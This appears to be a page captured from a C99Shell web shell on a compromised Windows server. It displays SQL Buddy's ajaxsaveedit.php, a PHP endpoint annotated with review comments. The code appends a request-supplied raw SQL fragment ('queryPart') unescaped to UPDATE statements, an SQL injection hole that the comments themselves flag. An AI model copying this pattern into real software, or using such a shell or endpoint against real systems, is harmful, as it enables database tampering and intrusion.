!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\boletinlegal\admin\report\sqlbuddy\   drwxrwxrwx
Free 1.15 GB of 239.26 GB (0.48%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]


Viewing file:     ajaxsaveedit.php (3.02 KB)      -rw-rw-rw-
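<?php
/*

SQL Buddy - Web based MySQL administration
http://www.sqlbuddy.com/

ajaxsaveedit.php
- saves data to the database

MIT license

2008 Calvin Lough <http://calv.in>

*/

// Builds a single UPDATE or INSERT statement from the posted form fields and
// answers with a small JSON object ("formupdate", "errormess").
//
// Trust boundary: everything in $_POST and $_GET is request-controlled.
// $db, $table, $conn and $binaryDTs are not defined in this file; presumably
// functions.php provides them -- NOTE(review): confirm where $db and $table
// are read from and whether they are validated there.
//
// loginCheck() is the only access control visible here and its behaviour is
// not shown. NOTE(review): confirm it terminates the request for
// unauthenticated callers, and that this state-changing endpoint requires an
// anti-CSRF token. A database admin tool like this should not be reachable
// from untrusted networks at all.

include "functions.php";

loginCheck();

if (isset($db))
    $conn->selectDB($db);

if ($_POST && isset($table)) {

    $adapter = $conn->getAdapter();

    // Identifiers are quoted with backticks (mysql) or single quotes (sqlite).
    // Doubling the quote character inside the name keeps a table or column
    // name from closing the quoting early.
    $quotedTable = "";
    if ($adapter == "mysql") {
        $quotedTable = "`" . str_replace("`", "``", $table) . "`";
    } else if ($adapter == "sqlite") {
        $quotedTable = "'" . str_replace("'", "''", $table) . "'";
    }

    $insertChoice = "";

    if (isset($_POST['SB_INSERT_CHOICE'])) {
        $insertChoice = $_POST['SB_INSERT_CHOICE'];
    }

    // NOTE(review): describeTable() receives $table as is; check that it
    // quotes the name itself.
    $structureSql = $conn->describeTable($table);

    // Seed every known column with an empty value and remember its type and
    // nullability (mysql only).
    if ($adapter == "mysql") {
        while ($structureRow = $conn->fetchAssoc($structureSql)) {
            $pairs[$structureRow['Field']] = '';
            $types[$structureRow['Field']] = $structureRow['Type'];
            $nulls[$structureRow['Field']] = (isset($structureRow['Null'])) ? $structureRow['Null'] : "YES";
        }
    } else if ($adapter == "sqlite") {
        // NOTE(review): $structureRow is never assigned on this path, so this
        // loop does not run; it looks like $structureSql was intended. Left
        // unchanged because the sqlite result shape is not visible here.
        foreach ($structureRow as $column) {
            $pairs[$column[0]] = '';
        }
    }

    // Copy the posted fields over the defaults. The keys become column names
    // and the values are escaped for use inside a quoted SQL string.
    foreach ($_POST as $key => $value) {
        if ($key != "SB_INSERT_CHOICE") {
            if (is_array($value)) {
                $value = implode(",", $value);
            }

            $pairs[$key] = $conn->escapeString($value);
        }
    }

    if (isset($pairs)) {

        if ($insertChoice != "INSERT") {
            $updates = "";

            // NOTE(review): only the mysql adapter contributes assignments
            // here, so an sqlite UPDATE is built with an empty SET list.
            foreach ($pairs as $keyname => $value) {
                if ($adapter == "mysql") {
                    $column = "`" . str_replace("`", "``", $keyname) . "`";

                    // A value is emitted unquoted only for binary columns and
                    // only when the whole value is a hex literal. escapeString()
                    // protects quoted strings, not bare SQL, so "starts with 0x"
                    // alone is not a sufficient test.
                    $isHexLiteral = isset($types[$keyname])
                        && isset($binaryDTs)
                        && in_array($types[$keyname], $binaryDTs)
                        && preg_match('/^0x[0-9A-Fa-f]+$/D', $value);

                    if ($isHexLiteral) {
                        $updates .= $column . "=" . $value . ",";
                    } else if (!$value && !($value != '' && (int)$value == 0) && isset($nulls[$keyname]) && $nulls[$keyname] == "YES") {
                        // Empty value on a nullable column is stored as NULL.
                        $updates .= $column . "=NULL,";
                    } else {
                        $updates .= $column . "='" . $value . "',";
                    }
                }
            }

            // Drop the trailing comma.
            $updates = substr($updates, 0, -1);

            // SECURITY: queryPart is a raw SQL fragment (presumably the WHERE
            // clause that selects the row) taken from the query string and
            // appended unescaped. It cannot be parameterised without changing
            // the request format, so it is flagged rather than rewritten. The
            // statement's scope is therefore entirely request-controlled, and
            // an empty queryPart makes the UPDATE apply to every row.
            // NOTE(review): replace with a structured key/value condition that
            // is built and escaped on the server.
            if (isset($_GET['queryPart']))
                $queryPart = $_GET['queryPart'];
            else
                $queryPart = "";

            if ($adapter == "mysql" || $adapter == "sqlite") {
                $query = "UPDATE " . $quotedTable . " SET " . $updates . " " . $queryPart;
            }

        } else {
            $columns = "";
            $values = "";

            foreach ($pairs as $keyname => $value) {

                if ($adapter == "mysql") {
                    $columns .= "`" . str_replace("`", "``", $keyname) . "`,";
                } else if ($adapter == "sqlite") {
                    $columns .= "'" . str_replace("'", "''", $keyname) . "',";
                }

                // Same rule as in the UPDATE branch: unquoted only for a
                // complete hex literal going into a binary column.
                $isHexLiteral = isset($types[$keyname])
                    && isset($binaryDTs)
                    && in_array($types[$keyname], $binaryDTs)
                    && preg_match('/^0x[0-9A-Fa-f]+$/D', $value);

                if ($isHexLiteral) {
                    $values .= $value . ",";
                } else {
                    $values .= "'" . $value . "',";
                }

            }

            // Drop the trailing commas.
            $columns = substr($columns, 0, -1);
            $values = substr($values, 0, -1);

            if ($adapter == "mysql" || $adapter == "sqlite") {
                $query = "INSERT INTO " . $quotedTable . " ($columns) VALUES ($values)";
            }
        }

        $conn->query($query) or ($dbError = $conn->error());

        // Both values go through json_encode() so that quotes, backslashes
        // and markup characters in the request-supplied form name or in the
        // database error text cannot break out of the JSON string.
        // (The option flags need PHP 5.3 or later.)
        $jsonFlags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;

        $formName = (isset($_GET['form']) && is_string($_GET['form'])) ? $_GET['form'] : "";
        $formJson = json_encode($formName, $jsonFlags);
        if ($formJson === false) {
            $formJson = '""';
        }

        $errorJson = json_encode(isset($dbError) ? (string)$dbError : "", $jsonFlags);
        if ($errorJson === false) {
            // The client treats an empty errormess as success, so a message
            // that cannot be encoded must not collapse to "".
            $errorJson = isset($dbError) ? '"Database error (message could not be encoded)"' : '""';
        }

        echo "{\n";
        echo "    \"formupdate\": " . $formJson . ",\n";
        echo "    \"errormess\": " . $errorJson . "\n";
        echo '}';

    }
}

?>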

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--